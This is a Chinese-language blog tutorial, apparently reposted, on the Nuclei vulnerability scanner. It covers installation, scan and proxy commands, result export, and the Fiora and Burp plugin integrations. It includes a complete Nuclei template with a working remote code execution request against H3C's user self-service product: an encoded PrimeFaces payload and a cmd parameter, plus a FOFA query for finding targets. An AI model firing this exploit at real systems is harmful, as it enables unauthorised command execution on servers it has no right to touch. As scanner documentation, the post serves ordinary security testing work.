nuclei-初体验

admin 2024年5月15日22:29:48评论8 views字数 3926阅读13分5秒阅读模式

项目简介

Nuclei是一款基于YAML语法模板开发的定制化快速漏洞扫描器。它使用Go语言开发,具有很强的可配置性、可扩展性和易用性。

项目地址

https://nuclei.projectdiscovery.io     //官网地址https://github.com/projectdiscovery/nuclei   //工具下载地址https://github.com/projectdiscovery/nuclei-templates   //poc模板下载地址

工具安装

nuclei为go语言开发,需要go环境,我这里使用win操作系统,直接下载exe程序,go环境也可以不用。

nuclei-初体验

下载直接用即可:

nuclei-初体验

初次运行Nuclei会自动下载最新的nuclei-templates到当前用户根目录(/home/当前用户/nuclei-templates)

nuclei-初体验

扫描单个目标

nuclei -u https://test.com #使用socks5代理nuclei -u https://test.com -p socks5://127.0.0.1:1080 #使用http代理nuclei -u https://test.com -p http://127.0.0.1:8080

扫描多个目标

nuclei -list urls.txt #使用socks5代理nuclei -list urls.txt -p socks5://127.0.0.1:1080 #使用http代理nuclei -list urls.txt -p http://127.0.0.1:8080

其中urls.txt为扫描目标的URL,单个扫描或多个扫描,url只跟端口,不加其他路径,否则会影响扫描结果。

http://test.com http://admin.test.com http://192.168.1.127:8080http://192.168.1.127:50050

可以导出扫描的结果:

#输出结果为JSON格式nuclei -u https://example.com -json  #输出结果保存到result.txt文件nuclei -u https://example.com -o result.txt   #输出结果保存为Markdown格式文件nuclei -u https://example.com -me result

自定义poc模板

以H3C用户自助服务产品存在rce为例:

将poc放在模板目录下:

nuclei-初体验

漏洞复现参考下面两篇文章:

https://cloud.tencent.com/developer/article/2395674https://blog.csdn.net/weixin_52204925/article/details/136610277
id: H3C-RCE info:  name: 华三用户自助服务产品存在远程代码执行,恶意攻击者可利用此漏洞执行恶意命令,从而获取服务器敏感信息或者服务器权限。  author: WLF  severity: high  metadata:     fofa-query: fid="tPmVs5PL6e9m5Xt0J4V2+A=="variables:  filename: "{{to_lower(rand_base(10))}}"  boundary: "{{to_lower(rand_base(20))}}"http:  - raw:      - |        POST /mselfservice/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1        Host: {{Hostname}}        User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)        Content-Length: 1573        Content-Type: application/x-www-form-urlencoded        Accept-Encoding: gzip         pfdrt=sc&ln=primefaces&pfdrid=uMKljPgnOTVxmOB%2BH6%2FQEPW9ghJMGL3PRdkfmbiiPkUDzOAoSQnmBt4dYyjvjGhVqupdmBV%2FKAe9gtw54DSQCl72JjEAsHTRvxAuJC%2B%2FIFzB8dhqyGafOLqDOqc4QwUqLOJ5KuwGRarsPnIcJJwQQ7fEGzDwgaD0Njf%2FcNrT5NsETV8ToCfDLgkzjKVoz1ghGlbYnrjgqWarDvBnuv%2BEo5hxA5sgRQcWsFs1aN0zI9h8ecWvxGVmreIAuWduuetMakDq7ccNwStDSn2W6c%2BGvDYH7pKUiyBaGv9gshhhVGunrKvtJmJf04rVOy%2BZLezLj6vK%2BpVFyKR7s8xN5Ol1tz%2FG0VTJWYtaIwJ8rcWJLtVeLnXMlEcKBqd4yAtVfQNLA5AYtNBHneYyGZKAGivVYteZzG1IiJBtuZjHlE3kaH2N2XDLcOJKfyM%2FcwqYIl9PUvfC2Xh63Wh4yCFKJZGA2W0bnzXs8jdjMQoiKZnZiqRyDqkr5PwWqW16%2FI7eog15OBl4Kco%2FVjHHu8Mzg5DOvNevzs7hejq6rdj4T4AEDVrPMQS0HaIH%2BN7wC8zMZWsCJkXkY8GDcnOjhiwhQEL0l68qrO%2BEb%2F60MLarNPqOIBhF3RWB25h3q3vyESuWGkcTjJLlYOxHVJh3VhCou7OICpx3NcTTdwaRLlw7sMIUbF%2FciVuZGssKeVT%2FgR3nyoGuEg3WdOdM5tLfIthl1ruwVeQ7FoUcFU6RhZd0TO88HRsYXfaaRyC5HiSzRNn2DpnyzBIaZ8GDmz8AtbXt57uuUPRgyhdbZjIJx%2FqFUj%2BDikXHLvbUMrMlNAqSFJpqoy%2FQywVdBmlVdx%2BvJelZEK%2BBwNF9J4p%2F1fQ8wJZL2LB9SnqxAKr5kdCs0H%2FvouGHAXJZ%2BJzx5gcCw5h6%2Fp3ZkZMnMhkPMGWYIhFyWSSQwm6zmSZh1vRKfGRYd36aiRKgf3AynLVfTvxqPzqFh8BJUZ5Mh3V9R6D%2FukinKlX99zSUlQaueU22fj2jCgzvbpYwBUpD6a6tEoModbqMSIr0r7kYpE3tWAaF0ww4INtv2zUoQCRKo5BqCZFyaXrLnj7oA6RGm7ziH6xlFrOxtRd%2BLylDFB3dcYIgZtZoaSMAV3pyNoOzHy%2B1UtHe1nL97jJUCjUEbIOUPn70hyab29iHYAf3%2B9h0aurkyJVR28jIQlF4nT0nZqpixP%2Fnc0zrGppyu8dFzMqSqhRJgIkRrETErXPQ9sl%2BzoSf6CNta5ssizanfqqCmbwcvJkAlnPCP5OJhVes7lKCMlGH%2BOwPjT2xMuT6zaTMu3UMXeTd7U8yImpSbwTLhqcbaygXt8hhGSn5Qr7UQymKkAZGNKHGBbHeBIrEdjnVphcw9L2BjmaE%2BlsjMhGqFH6XWP5GD8FeHFtuY8bz08F4Wjt5wAeUZQOI4rSTpzgssoS1vbjJGzFukA07ahU%3D&cmd=echo Hello World!      matchers:      - type: dsl        dsl:          - status_code==200 && contains_all(body,"Hello World!")

执行:

nuclei.exe -u http://xx.xx.xx.xx:8080/ -t zhang3   -o result.txt

nuclei-初体验

联动Fiora

https://github.com/bit4woo/Fiora      //项目地址

直接java -jar xx.jar 或者点击运行即可:

nuclei-初体验

需要设置本地代理:

nuclei-初体验

开代理工具:

nuclei-初体验

它要去调用本地nuclei,所以要在环境变量配置路径:

nuclei-初体验

运行没问题:

nuclei-初体验

作为Burpsuite插件运行Fiora

安装插件

nuclei-初体验

配置一下即可:

nuclei-初体验

nuclei自动生成poc模板工具

https://github.com/projectdiscovery/nuclei-burp-plugin   //项目地址

nuclei-初体验

抓个包生成初始poc模板

nuclei-初体验

nuclei-初体验

改动一下,测试能用即可。

参考文章

https://blog.csdn.net/weixin_41489908/article/details/113608943https://www.cnblogs.com/cijian9000/p/16006359.htmlhttps://www.freebuf.com/articles/network/235745.htmlhttps://blog.csdn.net/asaotomo/article/details/122395708https://blog.csdn.net/qq_41315957/article/details/126594670


原文始发于微信公众号(NoteSec):nuclei-初体验

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月15日22:29:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   nuclei-初体验https://cn-sec.com/archives/2744926.html

发表评论

匿名网友 填写信息